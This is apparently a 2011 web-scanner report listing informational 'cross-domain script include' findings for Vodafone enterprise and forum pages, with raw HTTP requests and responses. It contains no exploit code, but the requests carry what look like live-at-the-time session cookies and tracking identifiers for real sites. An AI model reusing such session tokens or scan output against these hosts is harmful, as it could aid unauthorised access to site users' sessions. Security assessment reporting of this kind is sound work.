<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?pub=xa-4a298d635f4b7d13"></script>
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

9.2. http://enterprise.vodafone.com/home/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://enterprise.vodafone.com
Path:	/home/

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/250/addthis_widget.js?pub=xa-4a298d635f4b7d13
http://www.google-analytics.com/urchin.js

Request

Response

9.3. http://enterprise.vodafone.com/images/iconCartDarkred.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://enterprise.vodafone.com
Path:	/images/iconCartDarkred.gif

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/250/addthis_widget.js?pub=xa-4a298d635f4b7d13
http://www.google-analytics.com/urchin.js

Request

GET /images/iconCartDarkred.gif HTTP/1.1
Host: enterprise.vodafone.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://enterprise.vodafone.com/products_solutions/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_fv=flash%2011; JSESSIONID=abcm6Z7u519qTfa0K73ot; __utma=112384592.1735394827.1321640817.1321640817.1321640817.1; __utmc=112384592; __utmz=112384592.1321640817.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_lastvisit=1321640816999; sc_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vi=[CS]v1|276351BB051D181F-6000010340001B89[CE]; s_p7=flash%2011; styles=null; __utmb=112384592; s_cc=true; s_nr=1321640935355; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Date: Fri, 18 Nov 2011 18:29:02 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
Content-Length: 41836

<!DOCTYPE html PUBliC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?pub=xa-4a298d635f4b7d13"></script>
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

9.4. http://enterprise.vodafone.com/images/prod_browse_bkgrd2.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://enterprise.vodafone.com
Path:	/images/prod_browse_bkgrd2.gif

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/250/addthis_widget.js?pub=xa-4a298d635f4b7d13
http://www.google-analytics.com/urchin.js

Request

GET /images/prod_browse_bkgrd2.gif HTTP/1.1
Host: enterprise.vodafone.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://enterprise.vodafone.com/products_solutions/mobile_broadband/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_fv=flash%2011; JSESSIONID=abcm6Z7u519qTfa0K73ot; __utma=112384592.1735394827.1321640817.1321640817.1321640817.1; __utmc=112384592; __utmz=112384592.1321640817.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_lastvisit=1321640816999; sc_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vi=[CS]v1|276351BB051D181F-6000010340001B89[CE]; s_p7=flash%2011; __utmb=112384592; s_cc=true; s_nr=1321640944942; s_sq=vodafonegroupvgeprod%3D%2526pid%253Dproducts_solutions%25253Aindex%2526pidt%253D1%2526oid%253Djavascript%25253AjumpMenu%252528%252529%2526ot%253DA; styles=null

Response

HTTP/1.1 404 Not Found
Date: Fri, 18 Nov 2011 18:29:14 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
Content-Length: 41836

<!DOCTYPE html PUBliC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?pub=xa-4a298d635f4b7d13"></script>
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

9.5. http://enterprise.vodafone.com/insight_news/2011-11-04-fixed-mobile-convergence%E2%80%93the-first-step-in-a-unified-communications-strategy.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://enterprise.vodafone.com
Path:	/insight_news/2011-11-04-fixed-mobile-convergence%E2%80%93the-first-step-in-a-unified-communications-strategy.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

http://img.en25.com/Web/VodafoneGroupPLC/astadia%202011%2006%2007.js
http://platform.linkedin.com/in.js
http://platform.twitter.com/widgets.js
http://s7.addthis.com/js/250/addthis_widget.js?pub=xa-4a298d635f4b7d13
http://www.google-analytics.com/urchin.js

Request

GET /insight_news/2011-11-04-fixed-mobile-convergence%E2%80%93the-first-step-in-a-unified-communications-strategy.jsp HTTP/1.1
Host: enterprise.vodafone.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://enterprise.vodafone.com/home/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_fv=flash%2011; s_p7=flash%2011; JSESSIONID=abcm6Z7u519qTfa0K73ot; __utma=112384592.1735394827.1321640817.1321640817.1321640817.1; __utmb=112384592; __utmc=112384592; __utmz=112384592.1321640817.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_cc=true; s_lastvisit=1321640816999; sc_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vi=[CS]v1|276351BB051D181F-6000010340001B89[CE]; s_nr=1321640829806; s_sq=vodafonegroupvgeprod%3D%2526pid%253Dhome%25253Aindex%2526pidt%253D1%2526oid%253Dhttp%25253A//enterprise.vodafone.com/insight_news/2011-11-04-fixed-mobile-convergence%252525E2%25252580%25252593the-first-st%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 18 Nov 2011 18:27:14 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Pragma: no-cache
Content-Language: en-US
Content-Type: text/html; charset=utf-8
Content-Length: 66606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<!-- Page names should
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<br class="clear" />
<script type="text/javascript" src="http://platform.linkedin.com/in.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://img.en25.com/Web/VodafoneGroupPLC/astadia 2011 06 07.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="linkedin">
<script type="text/javascript" src="http://platform.linkedin.com/in.js"></script>
...[SNIP]...
</p>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?pub=xa-4a298d635f4b7d13"></script>
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

9.6. http://enterprise.vodafone.com/products_solutions/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://enterprise.vodafone.com
Path:	/products_solutions/

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/250/addthis_widget.js?pub=xa-4a298d635f4b7d13
http://www.google-analytics.com/urchin.js

Request

GET /products_solutions/ HTTP/1.1
Host: enterprise.vodafone.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://enterprise.vodafone.com/products_solutions/industry/financial-services.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_fv=flash%2011; JSESSIONID=abcm6Z7u519qTfa0K73ot; __utma=112384592.1735394827.1321640817.1321640817.1321640817.1; __utmc=112384592; __utmz=112384592.1321640817.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_lastvisit=1321640816999; sc_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vi=[CS]v1|276351BB051D181F-6000010340001B89[CE]; __utmb=112384592; s_cc=true; s_p7=flash%2011; s_nr=1321640932543; s_sq=vodafonegroupvgeprod%3D%2526pid%253Dproducts_solutions%25253Aindustry%25253Afinancial-services%25253Afinancial-services%2526pidt%253D1%2526oid%253Dhttp%25253A//enterprise.vodafone.com/products_solutions/%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 18 Nov 2011 18:28:58 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 52435

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?pub=xa-4a298d635f4b7d13"></script>
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

9.7. http://enterprise.vodafone.com/products_solutions/industry/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://enterprise.vodafone.com
Path:	/products_solutions/industry/

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/250/addthis_widget.js?pub=xa-4a298d635f4b7d13
http://www.google-analytics.com/urchin.js

Request

GET /products_solutions/industry/ HTTP/1.1
Host: enterprise.vodafone.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://enterprise.vodafone.com/products_solutions/mobile_broadband/usb_modem.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_fv=flash%2011; JSESSIONID=abcm6Z7u519qTfa0K73ot; __utma=112384592.1735394827.1321640817.1321640817.1321640817.1; __utmc=112384592; __utmz=112384592.1321640817.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_lastvisit=1321640816999; sc_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vi=[CS]v1|276351BB051D181F-6000010340001B89[CE]; s_p7=flash%2011; styles=null; __utmb=112384592; s_cc=true; s_nr=1321640961961; s_sq=vodafonegroupvgeprod%3D%2526pid%253Dproducts_solutions%25253Atype%25253Amobile_broadband%25253Ausb_modem%25253Ausb_modem%2526pidt%253D1%2526oid%253Dhttp%25253A//enterprise.vodafone.com/products_solutions/industry/%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 18 Nov 2011 18:29:29 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 50464

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?pub=xa-4a298d635f4b7d13"></script>
...[SNIP]...


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

9.8. http://enterprise.vodafone.com/products_solutions/industry/financial-services.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://enterprise.vodafone.com
Path:	/products_solutions/industry/financial-services.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

http://img.en25.com/Web/VodafoneGroupPLC/astadia%202011%2006%2007.js
http://s7.addthis.com/js/250/addthis_widget.js?pub=xa-4a298d635f4b7d13
http://www.google-analytics.com/urchin.js

Request

Response

HTTP/1.1 200 OK
Date: Fri, 18 Nov 2011 18:27:38 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 94421

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
...[SNIP]...
</script>
<script type="text/javascript" src="http://img.en25.com/Web/VodafoneGroupPLC/astadia 2011 06 07.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?pub=xa-4a298d635f4b7d13"></script>
...[SNIP]...


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

9.9. http://enterprise.vodafone.com/products_solutions/mobile_broadband/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://enterprise.vodafone.com
Path:	/products_solutions/mobile_broadband/

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/250/addthis_widget.js?pub=xa-4a298d635f4b7d13
http://www.google-analytics.com/urchin.js

Request

GET /products_solutions/mobile_broadband/ HTTP/1.1
Host: enterprise.vodafone.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://enterprise.vodafone.com/products_solutions/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_fv=flash%2011; JSESSIONID=abcm6Z7u519qTfa0K73ot; __utma=112384592.1735394827.1321640817.1321640817.1321640817.1; __utmc=112384592; __utmz=112384592.1321640817.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_lastvisit=1321640816999; sc_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vi=[CS]v1|276351BB051D181F-6000010340001B89[CE]; s_p7=flash%2011; styles=null; __utmb=112384592; s_cc=true; s_nr=1321640944942; s_sq=vodafonegroupvgeprod%3D%2526pid%253Dproducts_solutions%25253Aindex%2526pidt%253D1%2526oid%253Djavascript%25253AjumpMenu%252528%252529%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 18 Nov 2011 18:29:11 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 52615

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?pub=xa-4a298d635f4b7d13"></script>
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

9.10. http://enterprise.vodafone.com/products_solutions/mobile_broadband/usb_modem.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://enterprise.vodafone.com
Path:	/products_solutions/mobile_broadband/usb_modem.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/250/addthis_widget.js?pub=xa-4a298d635f4b7d13
http://www.google-analytics.com/urchin.js

Request

GET /products_solutions/mobile_broadband/usb_modem.jsp HTTP/1.1
Host: enterprise.vodafone.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://enterprise.vodafone.com/products_solutions/mobile_broadband/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_fv=flash%2011; JSESSIONID=abcm6Z7u519qTfa0K73ot; __utma=112384592.1735394827.1321640817.1321640817.1321640817.1; __utmc=112384592; __utmz=112384592.1321640817.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_lastvisit=1321640816999; sc_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vi=[CS]v1|276351BB051D181F-6000010340001B89[CE]; s_p7=flash%2011; styles=null; __utmb=112384592; s_cc=true; s_nr=1321640953111; s_sq=vodafonegroupvgeprod%3D%2526pid%253Dproducts_solutions%25253Atype%25253Amobile_broadband%25253Aindex%2526pidt%253D1%2526oid%253Dhttp%25253A//enterprise.vodafone.com/products_solutions/mobile_broadband/usb_modem.jsp%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 18 Nov 2011 18:29:19 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 49513

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?pub=xa-4a298d635f4b7d13"></script>
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

9.11. http://forum.vodafone.co.uk/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.vodafone.co.uk
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://connect.facebook.net/en_US/all.js
http://vodafoneuk.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js
http://vodafoneuk.i.lithium.com/t5/scripts/2A934D2BE3BC9B17AD44E894D3B0CB7A/lia-scripts-body-min.js
http://vodafoneuk.i.lithium.com/t5/scripts/BF02D75348A85A413B541ED547F88F2B/lia-scripts-common-min.js
https://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js

Request

GET / HTTP/1.1
Host: forum.vodafone.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 18 Nov 2011 18:42:04 GMT
Server: Apache
Set-Cookie: LiSESSIONID=BA63D58ED24E274B721ECAC91D049352; Path=/; HttpOnly
Set-Cookie: LithiumUserInfo=""; Domain=.vodafone.co.uk; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: LithiumUserSecure=""; Domain=.vodafone.co.uk; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 185384

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>


       <link class="lia-link
...[SNIP]...
<link rel="shortcut icon" href="/html/assets/favicon.ico" type="image/x-icon">
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://vodafoneuk.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://vodafoneuk.i.lithium.com/t5/scripts/BF02D75348A85A413B541ED547F88F2B/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://connect.facebook.net/en_US/all.js"></script><script type="text/javascript" src="http://vodafoneuk.i.lithium.com/t5/scripts/2A934D2BE3BC9B17AD44E894D3B0CB7A/lia-scripts-body-min.js"></script>
...[SNIP]...

9.12. http://forum.vodafone.co.uk/t5/Apple/bd-p/72 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.vodafone.co.uk
Path:	/t5/Apple/bd-p/72

Issue detail

The response dynamically includes the following scripts from other domains:

http://connect.facebook.net/en_US/all.js
http://vodafoneuk.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js
http://vodafoneuk.i.lithium.com/t5/scripts/5B16DF6CBE23F9D6A69BBB5A4BB6B299/lia-scripts-body-min.js
http://vodafoneuk.i.lithium.com/t5/scripts/BF02D75348A85A413B541ED547F88F2B/lia-scripts-common-min.js
https://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js

Request

GET /t5/Apple/bd-p/72 HTTP/1.1
Host: forum.vodafone.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 18 Nov 2011 18:42:04 GMT
Server: Apache
Set-Cookie: LiSESSIONID=5CA88AB70CDD9338DBD4A0F0D77DDAA5; Path=/; HttpOnly
Set-Cookie: LithiumUserInfo=""; Domain=.vodafone.co.uk; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: LithiumUserSecure=""; Domain=.vodafone.co.uk; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 245278

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>


       <link class="lia-link
...[SNIP]...
<link rel="shortcut icon" href="/html/assets/favicon.ico" type="image/x-icon">
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://vodafoneuk.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://vodafoneuk.i.lithium.com/t5/scripts/BF02D75348A85A413B541ED547F88F2B/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://connect.facebook.net/en_US/all.js"></script><script type="text/javascript" src="http://vodafoneuk.i.lithium.com/t5/scripts/5B16DF6CBE23F9D6A69BBB5A4BB6B299/lia-scripts-body-min.js"></script>
...[SNIP]...

9.13. http://forum.vodafone.co.uk/t5/BlackBerry/bd-p/50 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.vodafone.co.uk
Path:	/t5/BlackBerry/bd-p/50

Issue detail

The response dynamically includes the following scripts from other domains:

http://connect.facebook.net/en_US/all.js
http://vodafoneuk.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js
http://vodafoneuk.i.lithium.com/t5/scripts/5B16DF6CBE23F9D6A69BBB5A4BB6B299/lia-scripts-body-min.js
http://vodafoneuk.i.lithium.com/t5/scripts/BF02D75348A85A413B541ED547F88F2B/lia-scripts-common-min.js
https://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js

Request

GET /t5/BlackBerry/bd-p/50 HTTP/1.1
Host: forum.vodafone.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 18 Nov 2011 18:42:04 GMT
Server: Apache
Set-Cookie: LiSESSIONID=DDA7C5319DBBA671343F4E812A820817; Path=/; HttpOnly
Set-Cookie: LithiumUserInfo=""; Domain=.vodafone.co.uk; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: LithiumUserSecure=""; Domain=.vodafone.co.uk; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 237088

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>


       <link class="lia-link
...[SNIP]...
<link rel="shortcut icon" href="/html/assets/favicon.ico" type="image/x-icon">
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://vodafoneuk.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://vodafoneuk.i.lithium.com/t5/scripts/BF02D75348A85A413B541ED547F88F2B/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://connect.facebook.net/en_US/all.js"></script><script type="text/javascript" src="http://vodafoneuk.i.lithium.com/t5/scripts/5B16DF6CBE23F9D6A69BBB5A4BB6B299/lia-scripts-body-min.js"></script>
...[SNIP]...

9.14. http://forum.vodafone.co.uk/t5/HTC/bd-p/htc previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.vodafone.co.uk
Path:	/t5/HTC/bd-p/htc

Issue detail

The response dynamically includes the following scripts from other domains:

http://connect.facebook.net/en_US/all.js
http://vodafoneuk.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js
http://vodafoneuk.i.lithium.com/t5/scripts/5B16DF6CBE23F9D6A69BBB5A4BB6B299/lia-scripts-body-min.js
http://vodafoneuk.i.lithium.com/t5/scripts/BF02D75348A85A413B541ED547F88F2B/lia-scripts-common-min.js
https://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js

Request

GET /t5/HTC/bd-p/htc HTTP/1.1
Host: forum.vodafone.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 18 Nov 2011 18:42:05 GMT
Server: Apache
Set-Cookie: LiSESSIONID=25111786C93DB77FDC00C21F47D19B2C; Path=/; HttpOnly
Set-Cookie: LithiumUserInfo=""; Domain=.vodafone.co.uk; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: LithiumUserSecure=""; Domain=.vodafone.co.uk; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 239727

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>


       <link class="lia-link
...[SNIP]...
<link rel="shortcut icon" href="/html/assets/favicon.ico" type="image/x-icon">
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://vodafoneuk.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://vodafoneuk.i.lithium.com/t5/scripts/BF02D75348A85A413B541ED547F88F2B/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://connect.facebook.net/en_US/all.js"></script><script type="text/javascript" src="http://vodafoneuk.i.lithium.com/t5/scripts/5B16DF6CBE23F9D6A69BBB5A4BB6B299/lia-scripts-body-min.js"></script>
...[SNIP]...

